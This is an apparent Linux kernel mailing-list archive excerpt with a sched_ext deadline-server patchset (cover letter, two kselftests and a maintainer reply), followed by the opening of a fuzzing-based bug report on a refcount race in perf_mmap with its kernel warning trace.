+ class_str, expected_min_ratio * 100);
+ return true;
+ }
+ ksft_test_result_fail("FAIL: %s task got less than %.2f%% of runtime\n",
+ class_str, expected_min_ratio * 100);
+ return false;
+}
+
+static enum scx_test_status run(void *ctx)
+{
+ struct rt_stall *skel = ctx;
+ struct bpf_link *link = NULL;
+ bool res;
+ int i;
+
+ /*
+ * Test if the dl_server is working both with and without the
+ * sched_ext scheduler attached.
+ *
+ * This ensures all the scenarios are covered:
+ * - fair_server stop -> ext_server start
+ * - ext_server stop -> fair_server stop
+ */
+ for (i = 0; i < 4; i++) {
+ bool is_ext = i % 2;
+
+ if (is_ext) {
+ memset(&skel->data->uei, 0, sizeof(skel->data->uei));
+ link = bpf_map__attach_struct_ops(skel->maps.rt_stall_ops);
+ SCX_FAIL_IF(!link, "Failed to attach scheduler");
+ }
+ res = sched_stress_test(is_ext);
+ if (is_ext) {
+ SCX_EQ(skel->data->uei.kind, EXIT_KIND(SCX_EXIT_NONE));
+ bpf_link__destroy(link);
+ }
+
+ if (!res)
+ ksft_exit_fail();
+ }
+
+ return SCX_TEST_PASS;
+}
+
+static void cleanup(void *ctx)
+{
+ struct rt_stall *skel = ctx;
+
+ rt_stall__destroy(skel);
+}
+
+struct scx_test rt_stall = {
+ .name = "rt_stall",
+ .description = "Verify that RT tasks cannot stall SCHED_EXT tasks",
+ .setup = setup,
+ .run = run,
+ .cleanup = cleanup,
+};
+REGISTER_SCX_TEST(&rt_stall)
--
2.52.0
|
{
"author": "Andrea Righi <arighi@nvidia.com>",
"date": "Mon, 26 Jan 2026 10:59:04 +0100",
"thread_id": "aYDUqdQquFcqj7rQ@slm.duckdns.org.mbox.gz"
}
|
lkml
|
[PATCHSET v12 sched_ext/for-6.20] Add a deadline server for sched_ext tasks
|
sched_ext tasks can be starved by long-running RT tasks, especially since
RT throttling was replaced by deadline servers to boost only SCHED_NORMAL
tasks.
Several users in the community have reported issues with RT stalling
sched_ext tasks. This is fairly common on distributions or environments
where applications like video compositors, audio services, etc. run as RT
tasks by default.
Example trace (showing a per-CPU kthread stalled due to the sway Wayland
compositor running as an RT task):
runnable task stall (kworker/0:0[106377] failed to run for 5.043s)
...
CPU 0 : nr_run=3 flags=0xd cpu_rel=0 ops_qseq=20646200 pnt_seq=45388738
curr=sway[994] class=rt_sched_class
R kworker/0:0[106377] -5043ms
scx_state/flags=3/0x1 dsq_flags=0x0 ops_state/qseq=0/0
sticky/holding_cpu=-1/-1 dsq_id=0x8000000000000002 dsq_vtime=0 slice=20000000
cpus=01
This is often perceived as a bug in the BPF schedulers, but in reality they
can't do much: RT tasks run outside their control and can potentially
consume 100% of the CPU bandwidth.
Fix this by adding a sched_ext deadline server, so that sched_ext tasks are
also boosted and do not suffer starvation.
Two kselftests are also provided to verify the starvation fixes and
bandwidth allocation is correct.
== Design ==
- The EXT server is initialized at boot time and remains configured
throughout the system's lifetime
- It starts automatically when the first sched_ext task is enqueued
(rq->scx.nr_running == 1)
- The server's pick function (ext_server_pick_task) always selects
sched_ext tasks when active
- Runtime accounting happens in update_curr_scx() during task execution
and update_curr_idle() when idle
- Bandwidth accounting includes both fair and ext servers in root domain
calculations
- A debugfs interface (/sys/kernel/debug/sched/ext_server/) allows runtime
tuning of server parameters (see notes below)
== Notes ==
1) As discussed during the sched_ext microconference at LPC Tokyo, the plan
is to start with a simple approach, avoiding automatically creating or
tearing down the EXT server bandwidth reservation when a BPF scheduler is
loaded or unloaded. Instead, the reservation is kept permanently active.
This significantly simplifies the logic while still addressing the
starvation issue.
Any fine-tuning of the bandwidth reservation is delegated to the system
administrator, who can adjust it via the debugfs interface. In the future,
a more suitable interface can be introduced and automatic removal of the
reservation when the BPF scheduler is unloaded can be revisited.
A better interface to adjust the dl_server bandwidth reservation can be
discussed at the upcoming OSPM
(https://lore.kernel.org/lkml/aULDwbALUj0V7cVk@jlelli-thinkpadt14gen4.remote.csb/).
2) IMPORTANT: this patch requires [1] to function properly (sent
separately, not included in this patch set).
[1] https://lore.kernel.org/all/20260123161645.2181752-1-arighi@nvidia.com/
This patchset is also available in the following git branch:
git://git.kernel.org/pub/scm/linux/kernel/git/arighi/linux.git scx-dl-server
Changes in v12:
- Move dl_server execution state reset on stop fix to a separate patch
(https://lore.kernel.org/all/20260123161645.2181752-1-arighi@nvidia.com/)
- Removed per-patch changelog (keeping a global changelog here)
- Link to v11: https://lore.kernel.org/all/20260120215808.188032-1-arighi@nvidia.com/
Changes in v11:
- do not create/remove the bandwidth reservation for the ext server when a
BPF scheduler is loaded/unloaded, but keep the reservation bandwdith
always active
- change rt_stall kselftest to validate both FAIR and EXT DL servers
- Link to v10: https://lore.kernel.org/all/20250903095008.162049-1-arighi@nvidia.com/
Changes in v10:
- reordered patches to better isolate sched_ext changes vs sched/deadline
changes (Andrea Righi)
- define ext_server only with CONFIG_SCHED_CLASS_EXT=y (Andrea Righi)
- add WARN_ON_ONCE(!cpus) check in dl_server_apply_params() (Andrea Righi)
- wait for inactive_task_timer to fire before removing the bandwidth
reservation (Juri Lelli)
- remove explicit dl_server_stop() in dequeue_task_scx() to reduce timer
reprogramming overhead (Juri Lelli)
- do not restart pick_task() when invoked by the dl_server (Tejun Heo)
- rename rq_dl_server to dl_server (Peter Zijlstra)
- fixed a missing dl_server start in dl_server_on() (Christian Loehle)
- add a comment to the rt_stall selftest to better explain the 4%
threshold (Emil Tsalapatis)
- Link to v9: https://lore.kernel.org/all/20251017093214.70029-1-arighi@nvidia.com/
Changes in v9:
- Drop the ->balance() logic as its functionality is now integrated into
->pick_task(), allowing dl_server to call pick_task_scx() directly
- Link to v8: https://lore.kernel.org/all/20250903095008.162049-1-arighi@nvidia.com/
Changes in v8:
- Add tj's patch to de-couple balance and pick_task and avoid changing
sched/core callbacks to propagate @rf
- Simplify dl_se->dl_server check (suggested by PeterZ)
- Small coding style fixes in the kselftests
- Link to v7: https://lore.kernel.org/all/20250809184800.129831-1-joelagnelf@nvidia.com/
Changes in v7:
- Rebased to Linus master
- Link to v6: https://lore.kernel.org/all/20250702232944.3221001-1-joelagnelf@nvidia.com/
Changes in v6:
- Added Acks to few patches
- Fixes to few nits suggested by Tejun
- Link to v5: https://lore.kernel.org/all/20250620203234.3349930-1-joelagnelf@nvidia.com/
Changes in v5:
- Added a kselftest (total_bw) to sched_ext to verify bandwidth values
from debugfs
- Address comment from Andrea about redundant rq clock invalidation
- Link to v4: https://lore.kernel.org/all/20250617200523.1261231-1-joelagnelf@nvidia.com/
Changes in v4:
- Fixed issues with hotplugged CPUs having their DL server bandwidth
altered due to loading SCX
- Fixed other issues
- Rebased on Linus master
- All sched_ext kselftests reliably pass now, also verified that the
total_bw in debugfs (CONFIG_SCHED_DEBUG) is conserved with these patches
- Link to v3: https://lore.kernel.org/all/20250613051734.4023260-1-joelagnelf@nvidia.com/
Changes in v3:
- Removed code duplication in debugfs. Made ext interface separate
- Fixed issue where rq_lock_irqsave was not used in the relinquish patch
- Fixed running bw accounting issue in dl_server_remove_params
- Link to v2: https://lore.kernel.org/all/20250602180110.816225-1-joelagnelf@nvidia.com/
Changes in v2:
- Fixed a hang related to using rq_lock instead of rq_lock_irqsave
- Added support to remove BW of DL servers when they are switched to/from EXT
- Link to v1: https://lore.kernel.org/all/20250315022158.2354454-1-joelagnelf@nvidia.com/
Andrea Righi (2):
sched_ext: Add a DL server for sched_ext tasks
selftests/sched_ext: Add test for sched_ext dl_server
Joel Fernandes (5):
sched/deadline: Clear the defer params
sched/debug: Fix updating of ppos on server write ops
sched/debug: Stop and start server based on if it was active
sched/debug: Add support to change sched_ext server params
selftests/sched_ext: Add test for DL server total_bw consistency
kernel/sched/core.c | 6 +
kernel/sched/deadline.c | 86 +++++--
kernel/sched/debug.c | 171 +++++++++++---
kernel/sched/ext.c | 33 +++
kernel/sched/idle.c | 3 +
kernel/sched/sched.h | 2 +
kernel/sched/topology.c | 5 +
tools/testing/selftests/sched_ext/Makefile | 2 +
tools/testing/selftests/sched_ext/rt_stall.bpf.c | 23 ++
tools/testing/selftests/sched_ext/rt_stall.c | 240 +++++++++++++++++++
tools/testing/selftests/sched_ext/total_bw.c | 281 +++++++++++++++++++++++
11 files changed, 801 insertions(+), 51 deletions(-)
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.bpf.c
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.c
create mode 100644 tools/testing/selftests/sched_ext/total_bw.c
|
From: Joel Fernandes <joelagnelf@nvidia.com>
Add a new kselftest to verify that the total_bw value in
/sys/kernel/debug/sched/debug remains consistent across all CPUs
under different sched_ext BPF program states:
1. Before a BPF scheduler is loaded
2. While a BPF scheduler is loaded and active
3. After a BPF scheduler is unloaded
The test runs CPU stress threads to ensure DL server bandwidth
values stabilize before checking consistency. This helps catch
potential issues with DL server bandwidth accounting during
sched_ext transitions.
Tested-by: Christian Loehle <christian.loehle@arm.com>
Co-developed-by: Andrea Righi <arighi@nvidia.com>
Signed-off-by: Andrea Righi <arighi@nvidia.com>
Signed-off-by: Joel Fernandes <joelagnelf@nvidia.com>
---
tools/testing/selftests/sched_ext/Makefile | 1 +
tools/testing/selftests/sched_ext/total_bw.c | 281 +++++++++++++++++++
2 files changed, 282 insertions(+)
create mode 100644 tools/testing/selftests/sched_ext/total_bw.c
diff --git a/tools/testing/selftests/sched_ext/Makefile b/tools/testing/selftests/sched_ext/Makefile
index c9255d1499b6e..2c601a7eaff5f 100644
--- a/tools/testing/selftests/sched_ext/Makefile
+++ b/tools/testing/selftests/sched_ext/Makefile
@@ -185,6 +185,7 @@ auto-test-targets := \
select_cpu_vtime \
rt_stall \
test_example \
+ total_bw \
testcase-targets := $(addsuffix .o,$(addprefix $(SCXOBJ_DIR)/,$(auto-test-targets)))
diff --git a/tools/testing/selftests/sched_ext/total_bw.c b/tools/testing/selftests/sched_ext/total_bw.c
new file mode 100644
index 0000000000000..5b0a619bab86e
--- /dev/null
+++ b/tools/testing/selftests/sched_ext/total_bw.c
@@ -0,0 +1,281 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * Test to verify that total_bw value remains consistent across all CPUs
+ * in different BPF program states.
+ *
+ * Copyright (C) 2025 NVIDIA Corporation.
+ */
+#include <bpf/bpf.h>
+#include <errno.h>
+#include <pthread.h>
+#include <scx/common.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#include "minimal.bpf.skel.h"
+#include "scx_test.h"
+
+#define MAX_CPUS 512
+#define STRESS_DURATION_SEC 5
+
+struct total_bw_ctx {
+ struct minimal *skel;
+ long baseline_bw[MAX_CPUS];
+ int nr_cpus;
+};
+
+static void *cpu_stress_thread(void *arg)
+{
+ volatile int i;
+ time_t end_time = time(NULL) + STRESS_DURATION_SEC;
+
+ while (time(NULL) < end_time)
+ for (i = 0; i < 1000000; i++)
+ ;
+
+ return NULL;
+}
+
+/*
+ * The first enqueue on a CPU causes the DL server to start, for that
+ * reason run stressor threads in the hopes it schedules on all CPUs.
+ */
+static int run_cpu_stress(int nr_cpus)
+{
+ pthread_t *threads;
+ int i, ret = 0;
+
+ threads = calloc(nr_cpus, sizeof(pthread_t));
+ if (!threads)
+ return -ENOMEM;
+
+ /* Create threads to run on each CPU */
+ for (i = 0; i < nr_cpus; i++) {
+ if (pthread_create(&threads[i], NULL, cpu_stress_thread, NULL)) {
+ ret = -errno;
+ fprintf(stderr, "Failed to create thread %d: %s\n", i, strerror(-ret));
+ break;
+ }
+ }
+
+ /* Wait for all threads to complete */
+ for (i = 0; i < nr_cpus; i++) {
+ if (threads[i])
+ pthread_join(threads[i], NULL);
+ }
+
+ free(threads);
+ return ret;
+}
+
+static int read_total_bw_values(long *bw_values, int max_cpus)
+{
+ FILE *fp;
+ char line[256];
+ int cpu_count = 0;
+
+ fp = fopen("/sys/kernel/debug/sched/debug", "r");
+ if (!fp) {
+ SCX_ERR("Failed to open debug file");
+ return -1;
+ }
+
+ while (fgets(line, sizeof(line), fp)) {
+ char *bw_str = strstr(line, "total_bw");
+
+ if (bw_str) {
+ bw_str = strchr(bw_str, ':');
+ if (bw_str) {
+ /* Only store up to max_cpus values */
+ if (cpu_count < max_cpus)
+ bw_values[cpu_count] = atol(bw_str + 1);
+ cpu_count++;
+ }
+ }
+ }
+
+ fclose(fp);
+ return cpu_count;
+}
+
+static bool verify_total_bw_consistency(long *bw_values, int count)
+{
+ int i;
+ long first_value;
+
+ if (count <= 0)
+ return false;
+
+ first_value = bw_values[0];
+
+ for (i = 1; i < count; i++) {
+ if (bw_values[i] != first_value) {
+ SCX_ERR("Inconsistent total_bw: CPU0=%ld, CPU%d=%ld",
+ first_value, i, bw_values[i]);
+ return false;
+ }
+ }
+
+ return true;
+}
+
+static int fetch_verify_total_bw(long *bw_values, int nr_cpus)
+{
+ int attempts = 0;
+ int max_attempts = 10;
+ int count;
+
+ /*
+ * The first enqueue on a CPU causes the DL server to start, for that
+ * reason run stressor threads in the hopes it schedules on all CPUs.
+ */
+ if (run_cpu_stress(nr_cpus) < 0) {
+ SCX_ERR("Failed to run CPU stress");
+ return -1;
+ }
+
+ /* Try multiple times to get stable values */
+ while (attempts < max_attempts) {
+ count = read_total_bw_values(bw_values, nr_cpus);
+ fprintf(stderr, "Read %d total_bw values (testing %d CPUs)\n", count, nr_cpus);
+ /* If system has more CPUs than we're testing, that's OK */
+ if (count < nr_cpus) {
+ SCX_ERR("Expected at least %d CPUs, got %d", nr_cpus, count);
+ attempts++;
+ sleep(1);
+ continue;
+ }
+
+ /* Only verify the CPUs we're testing */
+ if (verify_total_bw_consistency(bw_values, nr_cpus)) {
+ fprintf(stderr, "Values are consistent: %ld\n", bw_values[0]);
+ return 0;
+ }
+
+ attempts++;
+ sleep(1);
+ }
+
+ return -1;
+}
+
+static enum scx_test_status setup(void **ctx)
+{
+ struct total_bw_ctx *test_ctx;
+
+ if (access("/sys/kernel/debug/sched/debug", R_OK) != 0) {
+ fprintf(stderr, "Skipping test: debugfs sched/debug not accessible\n");
+ return SCX_TEST_SKIP;
+ }
+
+ test_ctx = calloc(1, sizeof(*test_ctx));
+ if (!test_ctx)
+ return SCX_TEST_FAIL;
+
+ test_ctx->nr_cpus = sysconf(_SC_NPROCESSORS_ONLN);
+ if (test_ctx->nr_cpus <= 0) {
+ free(test_ctx);
+ return SCX_TEST_FAIL;
+ }
+
+ /* If system has more CPUs than MAX_CPUS, just test the first MAX_CPUS */
+ if (test_ctx->nr_cpus > MAX_CPUS)
+ test_ctx->nr_cpus = MAX_CPUS;
+
+ /* Test scenario 1: BPF program not loaded */
+ /* Read and verify baseline total_bw before loading BPF program */
+ fprintf(stderr, "BPF prog initially not loaded, reading total_bw values\n");
+ if (fetch_verify_total_bw(test_ctx->baseline_bw, test_ctx->nr_cpus) < 0) {
+ SCX_ERR("Failed to get stable baseline values");
+ free(test_ctx);
+ return SCX_TEST_FAIL;
+ }
+
+ /* Load the BPF skeleton */
+ test_ctx->skel = minimal__open();
+ if (!test_ctx->skel) {
+ free(test_ctx);
+ return SCX_TEST_FAIL;
+ }
+
+ SCX_ENUM_INIT(test_ctx->skel);
+ if (minimal__load(test_ctx->skel)) {
+ minimal__destroy(test_ctx->skel);
+ free(test_ctx);
+ return SCX_TEST_FAIL;
+ }
+
+ *ctx = test_ctx;
+ return SCX_TEST_PASS;
+}
+
+static enum scx_test_status run(void *ctx)
+{
+ struct total_bw_ctx *test_ctx = ctx;
+ struct bpf_link *link;
+ long loaded_bw[MAX_CPUS];
+ long unloaded_bw[MAX_CPUS];
+ int i;
+
+ /* Test scenario 2: BPF program loaded */
+ link = bpf_map__attach_struct_ops(test_ctx->skel->maps.minimal_ops);
+ if (!link) {
+ SCX_ERR("Failed to attach scheduler");
+ return SCX_TEST_FAIL;
+ }
+
+ fprintf(stderr, "BPF program loaded, reading total_bw values\n");
+ if (fetch_verify_total_bw(loaded_bw, test_ctx->nr_cpus) < 0) {
+ SCX_ERR("Failed to get stable values with BPF loaded");
+ bpf_link__destroy(link);
+ return SCX_TEST_FAIL;
+ }
+ bpf_link__destroy(link);
+
+ /* Test scenario 3: BPF program unloaded */
+ fprintf(stderr, "BPF program unloaded, reading total_bw values\n");
+ if (fetch_verify_total_bw(unloaded_bw, test_ctx->nr_cpus) < 0) {
+ SCX_ERR("Failed to get stable values after BPF unload");
+ return SCX_TEST_FAIL;
+ }
+
+ /* Verify all three scenarios have the same total_bw values */
+ for (i = 0; i < test_ctx->nr_cpus; i++) {
+ if (test_ctx->baseline_bw[i] != loaded_bw[i]) {
+ SCX_ERR("CPU%d: baseline_bw=%ld != loaded_bw=%ld",
+ i, test_ctx->baseline_bw[i], loaded_bw[i]);
+ return SCX_TEST_FAIL;
+ }
+
+ if (test_ctx->baseline_bw[i] != unloaded_bw[i]) {
+ SCX_ERR("CPU%d: baseline_bw=%ld != unloaded_bw=%ld",
+ i, test_ctx->baseline_bw[i], unloaded_bw[i]);
+ return SCX_TEST_FAIL;
+ }
+ }
+
+ fprintf(stderr, "All total_bw values are consistent across all scenarios\n");
+ return SCX_TEST_PASS;
+}
+
+static void cleanup(void *ctx)
+{
+ struct total_bw_ctx *test_ctx = ctx;
+
+ if (test_ctx) {
+ if (test_ctx->skel)
+ minimal__destroy(test_ctx->skel);
+ free(test_ctx);
+ }
+}
+
+struct scx_test total_bw = {
+ .name = "total_bw",
+ .description = "Verify total_bw consistency across BPF program states",
+ .setup = setup,
+ .run = run,
+ .cleanup = cleanup,
+};
+REGISTER_SCX_TEST(&total_bw)
--
2.52.0
|
{
"author": "Andrea Righi <arighi@nvidia.com>",
"date": "Mon, 26 Jan 2026 10:59:05 +0100",
"thread_id": "aYDUqdQquFcqj7rQ@slm.duckdns.org.mbox.gz"
}
|
lkml
|
[PATCHSET v12 sched_ext/for-6.20] Add a deadline server for sched_ext tasks
|
sched_ext tasks can be starved by long-running RT tasks, especially since
RT throttling was replaced by deadline servers to boost only SCHED_NORMAL
tasks.
Several users in the community have reported issues with RT stalling
sched_ext tasks. This is fairly common on distributions or environments
where applications like video compositors, audio services, etc. run as RT
tasks by default.
Example trace (showing a per-CPU kthread stalled due to the sway Wayland
compositor running as an RT task):
runnable task stall (kworker/0:0[106377] failed to run for 5.043s)
...
CPU 0 : nr_run=3 flags=0xd cpu_rel=0 ops_qseq=20646200 pnt_seq=45388738
curr=sway[994] class=rt_sched_class
R kworker/0:0[106377] -5043ms
scx_state/flags=3/0x1 dsq_flags=0x0 ops_state/qseq=0/0
sticky/holding_cpu=-1/-1 dsq_id=0x8000000000000002 dsq_vtime=0 slice=20000000
cpus=01
This is often perceived as a bug in the BPF schedulers, but in reality they
can't do much: RT tasks run outside their control and can potentially
consume 100% of the CPU bandwidth.
Fix this by adding a sched_ext deadline server, so that sched_ext tasks are
also boosted and do not suffer starvation.
Two kselftests are also provided to verify the starvation fixes and
bandwidth allocation is correct.
== Design ==
- The EXT server is initialized at boot time and remains configured
throughout the system's lifetime
- It starts automatically when the first sched_ext task is enqueued
(rq->scx.nr_running == 1)
- The server's pick function (ext_server_pick_task) always selects
sched_ext tasks when active
- Runtime accounting happens in update_curr_scx() during task execution
and update_curr_idle() when idle
- Bandwidth accounting includes both fair and ext servers in root domain
calculations
- A debugfs interface (/sys/kernel/debug/sched/ext_server/) allows runtime
tuning of server parameters (see notes below)
== Notes ==
1) As discussed during the sched_ext microconference at LPC Tokyo, the plan
is to start with a simple approach, avoiding automatically creating or
tearing down the EXT server bandwidth reservation when a BPF scheduler is
loaded or unloaded. Instead, the reservation is kept permanently active.
This significantly simplifies the logic while still addressing the
starvation issue.
Any fine-tuning of the bandwidth reservation is delegated to the system
administrator, who can adjust it via the debugfs interface. In the future,
a more suitable interface can be introduced and automatic removal of the
reservation when the BPF scheduler is unloaded can be revisited.
A better interface to adjust the dl_server bandwidth reservation can be
discussed at the upcoming OSPM
(https://lore.kernel.org/lkml/aULDwbALUj0V7cVk@jlelli-thinkpadt14gen4.remote.csb/).
2) IMPORTANT: this patch requires [1] to function properly (sent
separately, not included in this patch set).
[1] https://lore.kernel.org/all/20260123161645.2181752-1-arighi@nvidia.com/
This patchset is also available in the following git branch:
git://git.kernel.org/pub/scm/linux/kernel/git/arighi/linux.git scx-dl-server
Changes in v12:
- Move dl_server execution state reset on stop fix to a separate patch
(https://lore.kernel.org/all/20260123161645.2181752-1-arighi@nvidia.com/)
- Removed per-patch changelog (keeping a global changelog here)
- Link to v11: https://lore.kernel.org/all/20260120215808.188032-1-arighi@nvidia.com/
Changes in v11:
- do not create/remove the bandwidth reservation for the ext server when a
BPF scheduler is loaded/unloaded, but keep the reservation bandwdith
always active
- change rt_stall kselftest to validate both FAIR and EXT DL servers
- Link to v10: https://lore.kernel.org/all/20250903095008.162049-1-arighi@nvidia.com/
Changes in v10:
- reordered patches to better isolate sched_ext changes vs sched/deadline
changes (Andrea Righi)
- define ext_server only with CONFIG_SCHED_CLASS_EXT=y (Andrea Righi)
- add WARN_ON_ONCE(!cpus) check in dl_server_apply_params() (Andrea Righi)
- wait for inactive_task_timer to fire before removing the bandwidth
reservation (Juri Lelli)
- remove explicit dl_server_stop() in dequeue_task_scx() to reduce timer
reprogramming overhead (Juri Lelli)
- do not restart pick_task() when invoked by the dl_server (Tejun Heo)
- rename rq_dl_server to dl_server (Peter Zijlstra)
- fixed a missing dl_server start in dl_server_on() (Christian Loehle)
- add a comment to the rt_stall selftest to better explain the 4%
threshold (Emil Tsalapatis)
- Link to v9: https://lore.kernel.org/all/20251017093214.70029-1-arighi@nvidia.com/
Changes in v9:
- Drop the ->balance() logic as its functionality is now integrated into
->pick_task(), allowing dl_server to call pick_task_scx() directly
- Link to v8: https://lore.kernel.org/all/20250903095008.162049-1-arighi@nvidia.com/
Changes in v8:
- Add tj's patch to de-couple balance and pick_task and avoid changing
sched/core callbacks to propagate @rf
- Simplify dl_se->dl_server check (suggested by PeterZ)
- Small coding style fixes in the kselftests
- Link to v7: https://lore.kernel.org/all/20250809184800.129831-1-joelagnelf@nvidia.com/
Changes in v7:
- Rebased to Linus master
- Link to v6: https://lore.kernel.org/all/20250702232944.3221001-1-joelagnelf@nvidia.com/
Changes in v6:
- Added Acks to few patches
- Fixes to few nits suggested by Tejun
- Link to v5: https://lore.kernel.org/all/20250620203234.3349930-1-joelagnelf@nvidia.com/
Changes in v5:
- Added a kselftest (total_bw) to sched_ext to verify bandwidth values
from debugfs
- Address comment from Andrea about redundant rq clock invalidation
- Link to v4: https://lore.kernel.org/all/20250617200523.1261231-1-joelagnelf@nvidia.com/
Changes in v4:
- Fixed issues with hotplugged CPUs having their DL server bandwidth
altered due to loading SCX
- Fixed other issues
- Rebased on Linus master
- All sched_ext kselftests reliably pass now, also verified that the
total_bw in debugfs (CONFIG_SCHED_DEBUG) is conserved with these patches
- Link to v3: https://lore.kernel.org/all/20250613051734.4023260-1-joelagnelf@nvidia.com/
Changes in v3:
- Removed code duplication in debugfs. Made ext interface separate
- Fixed issue where rq_lock_irqsave was not used in the relinquish patch
- Fixed running bw accounting issue in dl_server_remove_params
- Link to v2: https://lore.kernel.org/all/20250602180110.816225-1-joelagnelf@nvidia.com/
Changes in v2:
- Fixed a hang related to using rq_lock instead of rq_lock_irqsave
- Added support to remove BW of DL servers when they are switched to/from EXT
- Link to v1: https://lore.kernel.org/all/20250315022158.2354454-1-joelagnelf@nvidia.com/
Andrea Righi (2):
sched_ext: Add a DL server for sched_ext tasks
selftests/sched_ext: Add test for sched_ext dl_server
Joel Fernandes (5):
sched/deadline: Clear the defer params
sched/debug: Fix updating of ppos on server write ops
sched/debug: Stop and start server based on if it was active
sched/debug: Add support to change sched_ext server params
selftests/sched_ext: Add test for DL server total_bw consistency
kernel/sched/core.c | 6 +
kernel/sched/deadline.c | 86 +++++--
kernel/sched/debug.c | 171 +++++++++++---
kernel/sched/ext.c | 33 +++
kernel/sched/idle.c | 3 +
kernel/sched/sched.h | 2 +
kernel/sched/topology.c | 5 +
tools/testing/selftests/sched_ext/Makefile | 2 +
tools/testing/selftests/sched_ext/rt_stall.bpf.c | 23 ++
tools/testing/selftests/sched_ext/rt_stall.c | 240 +++++++++++++++++++
tools/testing/selftests/sched_ext/total_bw.c | 281 +++++++++++++++++++++++
11 files changed, 801 insertions(+), 51 deletions(-)
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.bpf.c
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.c
create mode 100644 tools/testing/selftests/sched_ext/total_bw.c
|
Hello,
On Mon, Jan 26, 2026 at 10:58:58AM +0100, Andrea Righi wrote:
Peter, Ingo, this patchset has been around the block for a long time and the
remaining deadline and debug patches are reviewed and seem fairly isolated.
Given that the patchset addresses an on-going issue, I'd prefer to land the
series before the merge window. If you want to route 1-3 (or the whole
series) through sched/core, please let me know. Otherwise, I can them
through sched_ext tree.
Thanks.
--
tejun
|
{
"author": "Tejun Heo <tj@kernel.org>",
"date": "Mon, 2 Feb 2026 06:45:29 -1000",
"thread_id": "aYDUqdQquFcqj7rQ@slm.duckdns.org.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
